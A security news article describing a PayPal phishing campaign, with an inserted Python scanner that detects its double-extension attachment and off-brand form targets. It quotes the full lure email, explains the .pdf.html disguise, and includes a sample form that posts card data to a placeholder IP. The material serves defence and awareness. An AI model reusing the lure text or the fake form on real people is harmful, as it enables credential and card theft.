A new wave of PayPal phishing emails, carrying a fake form allegedly intended for updating account information, has been hitting people’s inboxes since yesterday.
The rogue emails purport to come from “PayPal.com” and bear the subject line “Your account has been temporarily limited !”
The body contains the PayPal logo and a message instructing users to fill in and submit the attached form. It reads:
Your account has been temporarily limited.
- We attached to this email a confirmation form to update your details .
- Please download an extract it .
- Submitting this form you will unlimit and restore your PayPal account .
- If you are using Internet Explorer please allow ActiveX for scripts to perform all data transfers securely .
Thanks for using PayPal - the safer, easier way to pay and get paid online.
The attached archive is called PayPal.com_Account_Confirmation_Form.pdf.zip and contains a file called PayPal.com_Account_Confirmation_Form.pdf.html.
The double extension is meant to trick users on operating systems automatically hiding the known file extensions, like Windows Vista and 7, into thinking the file is a PDF document.
When opened, the HTML displays a page that mimics the look and feel of the PayPal website and displays a form asking for personal and credit card information.
“Obviously, even though well dressed, this information isn't meant to go to PayPal to unlock your account, instead once the ‘Submit Profile’ button is pressed, your information is then posted to an IP that doesn't belong to PayPal at all,” said Fred Touchette, a senior security analyst at messaging security vendor AppRiver.
The IP address suggests that the server where the phished information gets stored is located in the Islamic Republic of Iran.
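The two indicators described above, a decoy double extension and a form that posts to a non-PayPal address, can be checked on a mail gateway before delivery. The following Python sketch is an added example, not code from AppRiver or PayPal; the extension lists, the `EXPECTED_DOMAIN` value, the size cap and the sample attachment (which uses the documentation address 192.0.2.10) are assumptions made for illustration.

```python
import io
import ipaddress
import zipfile
from html.parser import HTMLParser
from urllib.parse import urlparse

DECOY_EXTS = {"pdf", "doc", "docx", "xls", "jpg", "txt"}  # assumed list, tune as needed
ACTIVE_EXTS = {"html", "htm", "hta", "js", "vbs", "scr", "exe"}  # assumed list
EXPECTED_DOMAIN = "paypal.com"  # brand the message claims to come from

class FormActions(HTMLParser):
    def __init__(self):
        super().__init__()
        self.actions = []  # action URL of every <form> seen
    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")

def is_double_extension(name):
    parts = name.lower().rsplit(".", 2)
    return len(parts) == 3 and parts[1] in DECOY_EXTS and parts[2] in ACTIVE_EXTS

def off_brand(action):
    host = urlparse(action).hostname
    if host is None or host == EXPECTED_DOMAIN or host.endswith("." + EXPECTED_DOMAIN):
        return None  # relative URL or the expected brand domain
    try:
        ipaddress.ip_address(host)
        return f"form posts to raw IP address {host}"
    except ValueError:
        return f"form posts to off-brand host {host}"

def scan_attachment(zip_bytes, max_bytes=1_000_000):
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if is_double_extension(info.filename):
                findings.append(f"{info.filename}: double extension")
            # Only parse HTML members under the size cap (avoids decompression bombs).
            if info.filename.lower().endswith((".html", ".htm")) and info.file_size <= max_bytes:
                parser = FormActions()
                parser.feed(zf.read(info).decode("utf-8", "replace"))
                findings += [f"{info.filename}: {r}" for r in map(off_brand, parser.actions) if r]
    return findings

def build_sample():
    # Constructed attachment: file name from the article, 192.0.2.10 is a documentation IP.
    html = '<form method="post" action="http://192.0.2.10/save.php"><input name="card"></form>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("PayPal.com_Account_Confirmation_Form.pdf.html", html)
    return buf.getvalue()
```

Calling `scan_attachment(build_sample())` returns one finding for the file name and one for the form target; either is enough to quarantine a message that claims to come from PayPal.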
eBay-owned PayPal has been the phishers' favorite target for years now. According to statistics released by antivirus vendor Avira, in October PayPal accounted for over 57% of all phishing attacks on the Internet.